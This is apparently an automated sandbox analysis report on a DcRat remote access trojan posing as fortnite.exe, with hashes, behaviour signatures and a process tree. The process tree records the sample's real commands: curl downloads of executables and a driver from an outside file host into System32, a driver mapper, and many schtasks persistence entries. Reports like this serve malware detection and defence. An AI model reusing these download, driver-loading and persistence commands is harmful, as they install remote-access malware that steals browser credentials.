Analysis
-
max time kernel
93s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
17-11-2024 18:56
General
-
Target
fortnite.exe
-
Size
1.2MB
-
MD5
4ce2034a29fa1119013b35414ac146c8
-
SHA1
1bc3b7ff47f254f3058f8030e7081d48e762b1fc
-
SHA256
01d4438ab4eb34157102cef468aeafe178500b30a557efb0a14bcf117e7eeb8f
-
SHA512
9ff48316eff7b1cf2317ce9c363b596a42100c0f2ff3c17f06c3efe8f3f4b8de93072f594c4dfc7f7cdbf9b4c768643448141ca78bab4db28122f88d3ad64e27
-
SSDEEP
24576:zMbpm9Z/zQfnkuGKF7rlpC+bKlAtc06Du:PrQnIGz
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 4 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 17 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys3⤵
- Drops file in System32 directory
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe3⤵
- Drops file in System32 directory
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Tasks\mapper.exeC:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys3⤵
- Executes dropped EXE
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Medal\Medal.exe"C:\Medal/Medal.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eqKvXvM17R.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650017⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Medal\Medal.exe"C:\Medal\Medal.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Application Data\services.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\Application Data\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Application Data\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\ssh\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\ssh\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\ssh\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\Nui\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\SysWOW64\Nui\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\SysWOW64\Nui\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Medal\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Medal\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Medal\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 6 /tr "'C:\Medal\Medal.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 8 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63B
MD5e24619181276af563705f4b1bed29490
SHA1fddac27290319f69543f5330fe97c122a8a01376
SHA256eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05
SHA5121898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591
-
Filesize
224B
MD596d43070e1e39d421c53a2f8dca13fc6
SHA107417cccceddbf8d5f5b48dec0b2e08d53a4754f
SHA2560dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314
SHA5129fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398
-
Filesize
1.8MB
MD54f66bbfed3a524398bd0267ed974ccbc
SHA1b2567397dc823412d87a23428c7833ff74586b7d
SHA256fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8
SHA512bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
1KB
MD5af6acd95d59de87c04642509c30e81c1
SHA1f9549ae93fdb0a5861a79a08f60aa81c4b32377b
SHA2567521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6
SHA51293ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a
-
Filesize
146B
MD5c0f36d4ae61398308168e1a06eb84fba
SHA1d3bb21903a4514a5540b45f8e1ad277a80d5e504
SHA25609eae8e3b8c6c9ca9fc385a1ecf18431d11538607735db0650572e7f8860650a
SHA5125c708e84db2daa6afbbf82aa8a495ee9bf87e6b58d98f07145ef4ad937ff9c1bef42f2881160d83a14d348a64db96ecf387ef15712f8b14b7ba861641003871f
-
Filesize
2.1MB
MD5f4620c0afa8e21897509b2e7215097f5
SHA1af216ca6105e271a3fb45a23c10ee7cf3158b7e1
SHA2568daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82
SHA51268b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd
-
Filesize
12KB
MD510a7579c03da9baac0f2efc69673d8c2
SHA1acd27171757c05216665a332450f0604b33b07d5
SHA256797c199601f2dcee255c24da2507ba435f03dcee0fdadbe348023aa75ebb2ad3
SHA512a9cb4c7765e34bb3d8dc1356e37dfeca72e713731c036a3eb48bf69daac6c1f45910409e24ec01e1b13cd9d5d0cad708f1483cd83dcec00566cb307652fe7233
-
Filesize
530KB
MD554ed683eba9340abf6783bd8d7b39445
SHA1950e3c11c71354097c8440529b31f8ac2b3c32a8
SHA2562d0a9d5ca563ffa82a974903bb43411b22c863311ec926449f08d16f483e4e70
SHA5129ff8c110823bad1e0a79a810b151e1d5557022080af0c8aaa9ff76996bd040747346f62459c50468cf86f49389c0e5fb7f057e9bd30fa31fed49ae5692d50ae2
-
Filesize
708KB
-
Filesize
708KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
820KB
-
Filesize
112KB
-
Filesize
820KB
-
Filesize
56KB
-
Filesize
96KB
-
Filesize
320KB
-
Filesize
56KB
-
Filesize
1.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB